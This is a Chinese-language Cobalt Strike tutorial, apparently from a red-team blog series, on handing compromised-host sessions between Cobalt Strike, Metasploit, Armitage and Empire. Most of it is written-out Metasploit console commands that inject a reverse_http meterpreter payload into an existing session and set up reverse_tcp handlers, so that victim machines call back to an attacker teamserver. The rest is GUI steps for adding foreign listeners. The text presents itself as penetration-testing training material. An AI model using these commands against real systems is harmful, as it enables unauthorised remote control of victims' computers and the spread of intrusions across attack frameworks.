0x001-Cobaltstrike与MSF会话互转
①Metasploit派生shell给Cobaltstrike
首先,你需要拿到一个metepreter会话,本例中session为1
Cobaltstrike的teamserver的ip为8.8.8.8,http监听器端口为4555
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit
如图Cobaltstrike成功上线
②Cobalt strike 派生 shell 给 MSF(前提有个beacon shell)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit
然后在cobaltstrike中创建一个windows/foreign/reverse_tcp Listener
并根据metasploit监听配置cobaltstrike的listener
选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器
MSF即可成功收到会话
0x002-Cobaltstrike与Armitage会话互转
①Cobaltstrike派生shell给Armitage
首先在armitage中配置一个handler,注意:payload要与cobaltstrike的foreign监听器的协议相同,不然收不到会话。
同样使用刚刚讲过的cobaltstrike派生会话功能,armitage即可收到shell
Armitage派生shell给cobaltstrike
选择armitage中的会话,右键,Access-->Pss Session
随后配置相关信息为cobaltstrike http监听器的ip和端口
Cobaltstrike即可收到会话
0x003-Cobaltstrike与Empire会话互转
首先如图,在empire中配置好相关的http协议监听器
在cobaltstrike里面添加一个foreign监听器,协议为http
随后使用cobaltstrike中讲过的“增加会话”功能,选择该http监听器,empire即可成功收到会话。
本文始发于微信公众号(疯猫网络):Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论